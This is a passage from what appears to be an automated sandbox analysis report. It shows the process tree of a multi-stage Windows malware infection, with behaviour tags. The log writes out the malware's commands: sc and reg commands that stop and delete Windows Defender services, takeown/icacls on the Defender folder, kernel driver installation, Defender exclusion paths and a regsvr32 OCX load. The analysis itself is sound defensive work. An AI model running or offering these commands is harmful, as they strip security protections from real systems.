                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                    11⤵
                                                      PID:1820
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "WdFilter"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:4872
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "WdFilter"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:2496
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                      11⤵
                                                        PID:4076
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "SgrmAgent"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5492
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "SgrmAgent"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:4516
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                        11⤵
                                                          PID:5868
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecWfp"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:3700
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecWfp"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:4468
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                          11⤵
                                                            PID:2996
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "MsSecFlt"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:6044
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecFlt"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:5524
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                            11⤵
                                                              PID:4880
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4988
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4912
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                              11⤵
                                                                PID:4900
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                11⤵
                                                                  PID:4956
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                  11⤵
                                                                    PID:1576
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                    11⤵
                                                                      PID:4924
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                      11⤵
                                                                        PID:4192
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc stop ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:3004
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc delete ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:4788
                                                            • C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:3032
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c 67e8f4de3ad1d.vbs
                                                                7⤵
                                                                • Checks computer location settings
                                                                • Modifies registry class
                                                                PID:2148
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                                                  8⤵
                                                                    PID:5016
                                                              • C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
                                                                6⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2276
                                                                • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                  7⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3544
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBE9.tmp\DBEA.tmp\DBEB.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                    8⤵
                                                                      PID:4596
                                                                      • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                                                                        9⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5624
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD12.tmp\DD13.tmp\DD14.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                                                                          10⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:1360
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                            11⤵
                                                                              PID:5660
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc start ddrver
                                                                              11⤵
                                                                                PID:3812
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                11⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:2160
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:3620
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc start ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2032
                                                                              • C:\Windows\system32\takeown.exe
                                                                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:1168
                                                                              • C:\Windows\system32\icacls.exe
                                                                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:1892
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop "WinDefend"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:3236
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc delete "WinDefend"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:1612
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                11⤵
                                                                                  PID:4220
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc stop "MDCoreSvc"
                                                                                  11⤵
                                                                                  • Launches sc.exe
                                                                                  PID:2284
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc delete "MDCoreSvc"
                                                                                  11⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4024
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                  11⤵
                                                                                    PID:1980
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc stop "WdNisSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:4604
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc delete "WdNisSvc"
                                                                                    11⤵
                                                                                      PID:4288
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                      11⤵
                                                                                        PID:116
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop "Sense"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:216
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc delete "Sense"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:6024
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                        11⤵
                                                                                          PID:2088
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop "wscsvc"
                                                                                          11⤵
                                                                                          • Launches sc.exe
                                                                                          PID:5536
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc delete "wscsvc"
                                                                                          11⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2832
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                          11⤵
                                                                                            PID:2104
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc stop "SgrmBroker"
                                                                                            11⤵
                                                                                            • Launches sc.exe
                                                                                            PID:324
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc delete "SgrmBroker"
                                                                                            11⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1404
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                            11⤵
                                                                                              PID:3176
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc stop "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:3292
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc delete "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:1748
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                              11⤵
                                                                                                PID:3928
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "webthreatdefsvc"
                                                                                                11⤵
                                                                                                  PID:4016
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc delete "webthreatdefsvc"
                                                                                                  11⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1424
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                  11⤵
                                                                                                    PID:5844
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "webthreatdefusersvc"
                                                                                                    11⤵
                                                                                                      PID:4052
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      sc delete "webthreatdefusersvc"
                                                                                                      11⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:5828
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                      11⤵
                                                                                                        PID:4952
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop "WdNisDrv"
                                                                                                        11⤵
                                                                                                          PID:1964
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc delete "WdNisDrv"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:4480
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                          11⤵
                                                                                                            PID:4672
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop "WdBoot"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:4804
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete "WdBoot"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:5032
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                            11⤵
                                                                                                              PID:4812
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc stop "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:464
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:3132
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                              11⤵
                                                                                                                PID:4380
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "SgrmAgent"
                                                                                                                11⤵
                                                                                                                  PID:6072
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "SgrmAgent"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1616
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                  11⤵
                                                                                                                    PID:4696
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "MsSecWfp"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4544
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "MsSecWfp"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4700
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                    11⤵
                                                                                                                      PID:4692
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:5288
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4864
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                      11⤵
                                                                                                                        PID:3076
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "MsSecCore"
                                                                                                                        11⤵
                                                                                                                          PID:6120
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc delete "MsSecCore"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5732
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                          11⤵
                                                                                                                            PID:4800
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                            11⤵
                                                                                                                              PID:4680
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                              11⤵
                                                                                                                                PID:4084
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                11⤵
                                                                                                                                  PID:404
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:544
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop ddrver
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:1820
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc delete ddrver
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4872
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1904
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                            7⤵
                                                                                                                            • Downloads MZ/PE file
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:424
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4356
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:464
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  9⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:3320
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5884
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  9⤵
                                                                                                                                    PID:908
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:4936
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    9⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:1884
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:4652
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-G1MPM.tmp\Bell_Setup16.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-G1MPM.tmp\Bell_Setup16.tmp" /SL5="$A02EC,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                    9⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:4452
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                      10⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6024
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IHPDT.tmp\Bell_Setup16.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IHPDT.tmp\Bell_Setup16.tmp" /SL5="$1101BC,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                        11⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:5776
                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                          "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                                                                                                          12⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5360
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                            13⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:6064
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                            "PowerShell.exe" -NoProfile -NonInteractive -Command -
                                                                                                                                            13⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2268
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                            13⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:3656
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6500
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                    9⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:6532
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:6744
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                      10⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:5044
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10045200101\3d50c35515.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045200101\3d50c35515.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:8364
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10045200101\3d50c35515.exe"
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:8932
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10045210101\0dff13ea4f.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045210101\0dff13ea4f.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:10276
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10045210101\0dff13ea4f.exe"
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3884
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10045220101\76ab54ba48.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045220101\76ab54ba48.exe"
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:12496
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10380550101\b4c27f0350.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10380550101\b4c27f0350.exe"
                                                                                                                              6⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1168
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10381540101\0f961ef40e.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10381540101\0f961ef40e.exe"
                                                                                                                              6⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4748
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4472
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:4820
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:4968
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:5164
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      7⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:952
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381570101\532523dcb6.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381570101\532523dcb6.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4712
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"
                                                                                                                                    6⤵
